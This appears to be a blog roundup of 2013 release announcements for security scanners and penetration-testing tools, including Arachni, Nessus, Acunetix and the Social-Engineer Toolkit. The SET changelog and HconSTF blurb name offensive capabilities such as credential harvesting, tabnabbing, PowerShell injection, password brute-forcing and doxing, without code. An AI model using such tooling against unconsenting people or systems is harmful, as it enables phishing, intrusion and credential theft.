UPDATE ARANCHI V0.4.2 - WEB APPLICATION SECURITY SCANNER FRAMEWORK

Arachni is an Open Source, feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications.

It is smart, it trains itself by learning from the HTTP responses it receives during the audit process and is able to perform meta-analysis using a number of factors in order to correctly assess the trustworthiness of results and intelligently identify false-positives.

It is versatile enough to cover a great deal of use cases, ranging from a simple command line scanner utility, to a global high performance grid of scanners, to a Ruby library allowing for scripted audits, to a multi-user multi-scan web collaboration platform.

Features

• Cookie-jar/cookie-string support.
• Custom header support.
• SSL support.
• User Agent spoofing.
• Proxy support for SOCKS4, SOCKS4A, SOCKS5, HTTP/1.1 and HTTP/1.0.
• Proxy authentication.
• Site authentication (Automated form-based, Cookie-Jar, Basic-Digest, NTLM and
• others).
• Automatic log-out detection and re-login during the audit (when the initial login was
• performed via the AutoLogin plugin).
• Custom 404 page detection.
• UI abstraction:
• Command-line Interface.
• Web User Interface.
• Pause/resume functionality.
• High Performance asynchronous HTTP requests

Major improvements with 0.4.2

• Users

  Regular users can enjoy:
  • The ability to easily perform and manage scans via the brand new, Rails-based, simple, intuitive and beautiful web user interface — I’m overselling it a bit out of excitement.
  • Much reduced RAM usage.
  • More fluid and smoother progress %.
  • Issue remarks –  Providing extra context to logged issues and assisting you in determining the nature, variation and special circumstances that may apply.
  • More resilient stance towards non-responsive servers.
  • Much improved profiling and detection of custom 404 responses.
  • Improved payloads for Windows machines for path traversal and OS command injection.
  • The ability to exclude pages from the scan based on content.

  Developers

  Oh you devs out there controlling Arachni via RPC are gonna love these:
  • Default serialization changed to Marshal, which translates to much faster and less bandwidth consuming RPC calls.
    • YAML serialization is still supported and it is an automatic fallback, YAML requests will still illicit a YAML response. Careful though, the engine has been changed to Psych, which has been the Ruby default for a while now.
  • A bunch of convenience methods have been added to Arachni::RPC::Server::Instance, allowing you to perform and control scans much easier than before.
  • More data returned for logged Issues during runtime.

  Service providers

  Well, you get to enjoy all of the above but at a higher, more abstract level:
  • Significantly reduced RAM consumption.
  • Significantly reduced bandwidth and CPU usage for RPC calls.
  • Improved progress information for statistics, issues and progress %.
  I.e. Fewer costs, happier devs and happier clients.
DOWNLOAD -

Linux

You can download self-contained packages for Linux for the following architectures:
Linux x86 32bit (SHA1)
Linux x86 64bit (SHA1)

If you get a GLIBC error please update your system.

Mac OSX 10.8 (Mountain Lion)

Mac OSX users can download the self-contained Mac OSX x86 64bit (SHA1) package.
 If you get a segmentation fault please update your system.
CHANGELOG.
Source-
http://www.arachni-scanner.com/blog/new-release-v0-4-2-new-interface-new-website/

Screenshot -

Nessus 5.2 Released

Nessus® is the industry’s most widely-deployed vulnerability and configuration assessment
product. Nessus features high-speed discovery, configuration auditing, asset profiling, sensitive
data discovery, patch management integration, and vulnerability analysis of your security
posture. Fueled by Nessus ProfessionalFeed®, a continuously-updated library with
more than 50,000 individual vulnerability and configuration checks, and supported by an expert
vulnerability research team, Nessus delivers accuracy to the marketplace. Nessus scales to
serve the largest organizations and is quick-and-easy to deploy.

Nessus Scanning Capabilities:
• Accurate, high-speed asset discovery
• Compliance auditing: FFIEC, FISMA, CyberScope Reporting Protocol, GLBA,HIPAA/HITECH,
NERC, PCI, SOX
• Configuration auditing: CERT, CIS, COBIT/ITIL, DISA STIGs, FDCC, IBM iSeries, ISO, NIST,
NSA
• Patch auditing: Includes patch management integration with IBM® TEM for Patch
Management, Microsoft® SCCM and WSUS, Red Hat® Network Satellite Server, and
VMware® Go
• Control systems auditing: SCADA systems, devices, and applications
• Sensitive content auditing: PII (credit card numbers, SSNs) and intellectual property
• Mobile device auditing: Lists iOS, Android™, and Windows Phone 7 devices accessing the
network and detects mobile vulnerabilities
• Vulnerability scanning for:
–– Network devices: Juniper, Cisco, firewalls, printers, and more
–– Virtual hosts: VMware ESX, ESXi, vSphere, vCenter
–– Operating systems: Windows, Mac, Linux, Solaris, BSD, Cisco iOS, IBM iSeries
–– Databases: Oracle, SQL Server, MySQL, DB2, Informix/DRDA, PostgreSQL
––Web applications: Web servers, web services, OWASP vulnerabilities
–– Compromise detection: Viruses, malware, backdoors, hosts communicating with
botnetinfected

systems, web services linking to malicious content
• Credentialed scanning detects local vulnerabilities and conditions
• Uncredentialed network-based scanning finds new hosts and vulnerabilities
• Certified SCAP vulnerability scanner

Tenable has announced a new release of the Nessus vulnerability scanner! This is a major release (moving from 5.0.3 to 5.2.0) which provides several new features and enhancements, including:

• IPv6 is now supported on all platforms (including Windows)
• Nessus server support for Windows 8 and Windows 2012
• Add attachments within scan result reports
• Mac OS X preference pane
• Digitally-signed Nessus RPM packages for supporting distributions
• Smaller memory footprint and reduced disk space usage
• Faster, more responsive web interface (uses less bandwidth)
• No longer need to visit the Tenable website for an activation code!

Download latest version 

Getting Nessus 5.2
New users may download and evaluate Nessus free of charge by visiting the Nessus home page. Current customers can download 5.2 from the Tenable Support Portal. Detailed instructions and notes on upgrading are located in the Nessus 5.2 Installation and Configuration Guide.

Source-

http://www.tenable.com/products/nessus/new-in-nessus-52

http://www.tenable.com/blog/nessus-52-released

For more information -
http://www.toolswatch.org/2013/04/nessus-5-2-a-major-release-in-the-wild-enhanced-post-scan-analysis-tools/
Tenable Network Security Announces Nessus 5.2 Vulnerability Scanner

New in Nessus 5.2

Acunetix Web Vulnerability Scanner v8 build 20130416 with New WordPress Checks

This new release of Acunetix Web Vulnerability Scanner version 8, build 20130416, includes new and improved vulnerability checks which target WordPress installations, web applications hosted on Amazon S3, various other web applications.

New Functionality

• Added a test that enumerates valid WordPress usernames using various techniques.
• Added a test for weak WordPress passwords for the usernames identified during the scan.
• Added a test that identifies common WordPress plugins. For each plugin identified, Acunetix WVS will try to enumerate the plugin name, short description, installed version and latest version of the plugin. This information is shown in a Knowledge Base item.
• Added a test that identifies Amazon S3 public buckets.
• Added a test for the security hotfix for ColdFusion 10, 9.0.2, 9.0.1 and 9.0 for Windows, Macintosh and UNIX (Adobe Vulnerability ID: APSB13-10; CVE-2013-1387, CVE-2013-1388)
• Added a test looking for Apache Tomcat SessionExample servlet that can allow session manipulation.
• Added a test for Drupal Views Module Information Disclosure Vulnerability.
• Added a test for Gallery v3.0.4 Remote Code Execution.
• Added a test for Jenkins Dashboard (http://jenkins-ci.org/).
• Added a test for Roundcube Webmail Security updates 0.8.6 and 0.7.3.
• Added a test for WordPress 3.4.2 Cross Site Request Forgery.
• Added a test looking for a Cross-Site Scripting vulnerability in older versions of jQuery which affected Drupal amongst others.
• Added a test looking for SQL Injection in Symphony v2.3.1 (CVE-2013-2599)

Improvements

• Client Script Analyser: Optimized script source retrieval (modernizr-2.5.3.js)
• Improved XSS in URI script to test for Apache Tomcat Path Parameters.
• Improved WordPress Pingback Scanner test.
• Improved Blind SQL Injection script.
• Improved Crossdomain_XML script.
• Improved Directory Traversal script.
• Improved Error_Message script.
• Improved URL redirection script.
• Improved XSS testing script.
• The amount of input schemes has been reduced for known applications, improving the scan performance for such web applications.

Bug Fixes

• Fixed an issue which caused false positives to occasionally show up in the report for Scheduled Scans.
• Better handling for META http-equiv="refresh" tags by the Crawler.
• Fixed an issue in error_messages_helpers.inc script.
• Fixed a minor bug in the Scheduler UI (Bug ID: 364)
• North and South Korea are now correctly identified in the Product Activation Wizard.
• Scans were sporadically entering a loop when scanning certain sites using a login sequence and the CSRF check was enabled.
• WebApps scripts were being invoked even though they were excluded in the scanning profile

How to Upgrade

When you start Acunetix WVS 8, you will be notified that a new build is available to download. Navigate to the General > Program Updates node in the Tools explorer, click on Download and Install the new build.

Source-
http://www.acunetix.com/blog/releases/acunetix-wvs-v8-build-20130416/

The Social-Engineer Toolkit (SET) Version 5.0 “The Wild West” released

TrustedSec is proud to announce the release of the Social-Engineer Toolkit (SET) v5.0 codename: The Wild West. This version is a culmination of six months of development, bug squashing, and user feedback. New with this version includes a completely redesigned multiprocessing web server that handles non-rfc compliant HTTP information. The builtin SET web server would on occasion crash when receiving unexpected characters. The new version of the web server is stable, and significantly faster. This version if Kali Linux compliant (FSH) where all information is now moved and removed from src/program_junk and to your ~/.set home directory.

In addition to FSH structuring of SET, we have also added some significant performance and stability updates. For example, traditionally if you launched an attack, you would have to exit out of SET completely then relaunch. The dynamic importing has now changed to fix this and improve the ability to reuse modules.

For a full list of changes, the changelog can be found below:

~~~~~~~~~~~~~~~~
version 5.0
~~~~~~~~~~~~~~~~

* fixed a bug that would cause tabnabbing to throw an exceptions around check_options
* added setcore modules into tabnabbing to allow centralized routines
* fixed a bug that would cause webjacking to throw an exeptions around check_options
* added git clean -fd prior to set update, this will force a clean when pulling the latest files
* fixed a bug that would cause a system not setup properly when installing in setup.py
* fixed a bug on start_dns() upon launch will cause errors on certain systems
* added installation script for putting SET into /usr/bin and /usr/share for FSH compliant installer
* added set-update to the installation path, can type that anywhere now
* added set-automate to the list to be typed in anywhere
* fixed a bug that would cause the java applet method to not work a second time in use (reload)
* rewrote MASSIVE amounts of code to no longer use src/program_junk for storage of applications, its now all under ~./set
* fixed a os.chdir issue when using it to spawn a web server during java applet, moved to multi processing instead of threading.thread
* fixed a bug that caused credential harvester to throw an exceptions with the new ~./.set directory structure
* centralized setdir into the main repository to handle it through there and to call the ~/.set directory
* added additional passwords to wordlist.txt used for fast-track mssql brute forcing
* fixed a mssql access bug that would cause fast-track to error out if unspecified IP was added
* removed the pymssql check from the initial SET start and onto Fast-Track since it’s only used there
* turned java repeater to ON by default, much better success rate in SE pentesting
* rewrote large portions of payloadgen to incorporate the changes to the new ~/.set path variables
* added a new file structure to launch set called se-toolkit. The set executable is now depricated and should no longer be used – to launch set just type ./se-toolkit
* updated the setup.py installation to be more robust when performing installations (windows, etc.)
* moved all of the reporting structures within SET to the new ~/.set directory
* added a checkup routine in set and se-toolkit to check for the reports directory
* fixed a bug that would cause multi powershell injection to trigger even when using the powershell menu, it will just generate one now
* fixed an issue that could cause powershell injection to not work properly using the fast patch method
* fixed an issue that would cause definepath to not be specified when using the SE Toolkit Interactive shell
* fixed relative path issues in sccm_main and powershell teensy vectors to point to new .set directory
* fixed an issue that would cause the SE toolkit to hang on a weird bug when importing binascii – moved binascii to main import above and no longer hung
* fixed a before assignment error when using the windows debug conversion in the fast-track mssql menu (meta_path reference)
* changed reports directory within the teensy side to move to ~/.set/reports
* moved the report_generator in harvester to pull and report on the new ~/.set reports structure
* fixed an issue where webjacking would not post properly on certain websites (index2.html conflict issue)
* added the Metasploit MS13-009-IE SLayoutrun Use After Free Exploit to the Metasploit Brwoser Exploit attacks
* fixed a parsing issue with the JMX bean exploit in the SET menu text from appearing to be on one line
* added a new description on setting up sendmail for Kali Linux
* added a check for multi powershell injection and check for solo instances through powershell teensy and not to generate a ton
* changed the email handler from control-c to END instead. Control-C will break multiprocessing within src.html.spawn and this is the proper way to do it
* cleaned up setcore with old code and optimized other areas of the code base
* reduced the description of the allports payload when selecting in web attack method
* added a completely new and redesigned multi threaded and multiprocessing web server – should be significantly faster with less bugs and crashing when handling non-rfc compliant HTTP requests
* optimized applet load time to be much more efficent when being loaded into the web attack vector (about 4 seconds improvement)
* rewrote exceptions handler for the new web server to check to see if anything is running on port 80 when starting
* turned java repeater to on by default – more stable and tested on multiple platforms
* fixed an issue that would cause the java applet web cloner to fail upon running it twice – added reload(module) option to fix the bug
* fixed an issue that caused powershell.prep to not load if used twice
* fixed an import error when using powershell injection through the main menu
* changed initial set menu in powershell to be the standard setprompt
* changed the default port to 443 on powershell delivery in the set option number 10
* fixed an issue that would cause the powershell injection to spawn on port 22 versus 443 as specified
* removed the man left in the middle attack – no longer in use, outdated and not maintained
* removed beautifulsoup as a dependancy for SET due to the removal of man left in the middle
* added the ability to call the web server and stop it based on stop_server()

Source-

https://www.trustedsec.com/april-2013/the-social-engineer-toolkit-set-version-5-0-the-wild-west/

Hcon Security Testing Framework (HconSTF) v0.5 [Fire Base] - codename 'Prime' released

HconSTF - a browser based security testing framework.As expected this version of Hcon, came with enhanced features and more functionality, so lets take a glance of HconSTF v0.5

HconSTF is semi-automated but you still need your brain to work it out. It can be use in all kind of security testing stages, it has tools for conducting tasks like,

• Web Penetration Testing
• Web Exploits Development
• Web Malware Analysis
• Open Source Intelligence ( Cyber Spying & Doxing )
• and much more with lots of hidden features

HconSTF v0.5 in Brief:-

• Based on Firefox 17.0.1
• Designed in Process based methodology
• Less in size (40mb packed-80mb extracted), consumes less memory
• More than 165+ search plugins
• New IDB 0.1 release integrated
• Underlined Logging for each and every request
• More NEW scanners for DomXSS, Reflected XSS
• New reporting features like note taking, url logging for easy report making
• Smart searchbox - just select and it will copy it and just change search engine to search
• Integrated Tor, AdvoR, I2p and more proxies
• New Grease monkey scripts (18 scripts)

To Download HconSTF v0.5 Click Here [Download Type- Portable (no need to install , run from usb drive or any memory card) Platform : Windows XP , Vista , 7 both x32 & x64]

Source-

http://www.hcon.in/index.html